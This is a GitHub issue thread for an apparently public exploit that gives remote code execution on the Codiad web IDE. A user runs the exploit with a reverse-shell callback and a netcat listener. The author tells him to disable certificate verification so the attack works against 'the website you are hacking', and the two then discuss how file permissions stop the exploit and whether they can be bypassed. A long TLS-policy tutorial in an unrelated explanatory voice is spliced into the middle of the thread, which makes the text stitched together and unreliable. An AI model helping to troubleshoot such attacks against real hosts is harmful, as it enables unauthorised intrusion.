WangYihang / Codiad-Remote-Code-Execute-Exploit

A simple exploit to execute system command on codiad

SSL Error #6

Closed scaery closed 6 years ago

scaery commented 6 years ago
root@kali:~/Desktop/Codiad-Remote-Code-Execute-Exploit# python exploit.py https://192.168.x.x/development admin admin 192.168.y.y 8888 windows
[+] Please execute the following command on your vps: 
nc -lnvp 8888
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
Traceback (most recent call last):
  File "exploit.py", line 160, in <module>
    main()
  File "exploit.py", line 143, in main
    if not login(domain, username, password):
  File "exploit.py", line 20, in login
    response = session.post(url, data=data)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 555, in post
    return self.request('POST', url, data=data, json=json, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/adapters.py", line 506, in send
    raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='192.168.x.x', port=443): Max retries exceeded with url: /webdevelopment/components/user/controller.php?action=authenticate (Caused by SSLError(SSLError(1, u'[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)'),))

What causes this issue?

WangYihang commented 6 years ago

I think the website you are hacking enables https but the CA is expired... This exploit uses requests to send an HTTP request, and there is an option to ignore the expired CA. You need to add this line after LINE 8:

session.verify = False

Then check if it works, and give me feedback.
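The CERTIFICATE_VERIFY_FAILED error in this thread is the HTTP client's TLS trust check failing, and session.verify = False switches that check off for the whole session, so anything on the path between the operator and the host can read or rewrite the request, including the credentials it carries. The following standard-library Python is an added example, not code from this repository or from either participant: it shows the three trust policies a client can use (system trust store, a specific PEM bundle that pins the server's own certificate or its private CA, or no verification at all) and a small helper that reads OpenSSL's reason text out of the error to suggest which policy fits. The reason keywords are OpenSSL's own; Python 2.7, the interpreter in the trace above, prints no reason, so that message comes back as "unknown". The function and parameter names are this example's, and note that a bare IP target such as 192.168.x.x fails the hostname check even with a valid certificate unless the certificate carries an IP SAN entry.

```python
import ssl
import urllib.error
import urllib.request

# Trust policies for a client talking TLS to a server whose certificate the
# system store does not accept (added example; nothing here is from exploit.py).


def build_tls_context(ca_bundle=None, insecure=False):
    """Return an ssl.SSLContext implementing one of three trust policies.

    ca_bundle=None, insecure=False : system trust store + hostname check
                                     (what requests does by default).
    ca_bundle="server.pem"         : trust ONLY the certificates in that PEM
                                     file, i.e. pin the server's own cert or
                                     the private CA that issued it
                                     (requests: session.verify = "server.pem").
    insecure=True                  : accept any certificate, no hostname check
                                     (requests: session.verify = False).
    """
    if insecure:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False          # must be cleared before verify_mode
        ctx.verify_mode = ssl.CERT_NONE
        return ctx
    # create_default_context keeps CERT_REQUIRED and check_hostname=True; when
    # cafile is given it replaces the system store rather than extending it.
    return ssl.create_default_context(cafile=ca_bundle)


def classify_verify_failure(message):
    """Map an SSLError's text to (cause, remedy that keeps verification on).

    The cause keywords are OpenSSL's X509 verify reasons as Python 3 embeds
    them in the error string; Python 2.7 prints only 'certificate verify
    failed', which is reported as 'unknown'.
    """
    msg = message.lower()
    if "hostname mismatch" in msg or "doesn't match" in msg:
        return ("name-mismatch",
                "connect using a name or IP that appears in the cert's SAN; "
                "a bare IP such as 192.168.x.x needs an IP SAN entry")
    if "certificate verify failed" not in msg and "certificate_verify_failed" not in msg:
        return ("not-a-trust-failure", "the error is not about certificate trust")
    if "expired" in msg:
        return ("expired",
                "renew the server certificate; pinning an expired cert still fails")
    if "self signed" in msg or "self-signed" in msg:
        return ("self-signed",
                "export the server cert to PEM and pass it as ca_bundle")
    if "unable to get local issuer" in msg:
        return ("unknown-issuer",
                "add the issuing private CA's certificate to ca_bundle")
    return ("unknown",
            "fetch the presented cert with ssl.get_server_certificate((host, port)) "
            "and inspect it before choosing a policy")


def fetch_with_policy(url, ca_bundle=None, insecure=False, timeout=10):
    """Open url with the chosen policy; on a trust failure return the
    classification instead of raising. Needs network, so it is not exercised
    offline; the two helpers above are."""
    ctx = build_tls_context(ca_bundle=ca_bundle, insecure=insecure)
    try:
        with urllib.request.urlopen(url, context=ctx, timeout=timeout) as resp:
            return ("ok", resp.status)
    except urllib.error.URLError as exc:  # urllib wraps the SSL error as .reason
        return classify_verify_failure(str(exc.reason))


if __name__ == "__main__":
    # The exact message from the trace above, used as constructed input.
    print(classify_verify_failure(
        "[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)"))
```

In practice the pinning branch is the one to reach for on a lab host with a self-signed certificate: export the certificate once, pass its path as ca_bundle (or as session.verify in requests), and verification stays on while the system store is left untouched.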

scaery commented 6 years ago

Thank you for your answer. Good monkey patch.

**EDIT: had a type error.

A shell is loosy, not popping cmd nor psh. W00T

Please consider adding the fix to your code; never mind, somebody will need it ;)

WangYihang commented 6 years ago

I think it's fixed; you can try it once again.

scaery commented 6 years ago

Yes, I tried and it works now with an expired CA and the SSL protocol, but if you do not have access due to inaccessible permissions it's still a problem.

I also used export PYTHONWARNINGS="ignore:Unverified HTTPS request" to suppress the warnings. Anyway, thank you for the support.

WangYihang commented 6 years ago

Hey bro, I have another problem. You said:

if you do not have access due to inaccessible permissions it's still a problem.

I am wondering if there is another vulnerability in Codiad; could you please provide more details about it? Like how to deploy the vulnerable environment? How to set the permission mask of the folders? I think maybe we do not need permission to trigger the vulnerability. @scaery

scaery commented 6 years ago

About:

inaccessible permissions

BUILTIN\Users:(I)(OI)(CI)(DENY)(W)

If the structure of the /workspace folder is set to "not writable" for the user, and config.php as well, the exploit fails: it can still read almost everything else (scripts in the workspace etc.) but cannot modify their contents, so the exploit will fail. A loophole I followed! I have investigated and troubleshot this error now. Thank you anyway.

My initial idea was to change config.php, replacing the "WORKSPACE" variable, but due to inaccessible permissions the exploit simply fails. That's it. No rocket science. Just a rabbit hole.

Do you mean we can just bypass the controller PATH and set it to somewhere writable?? Interesting! @WangYihang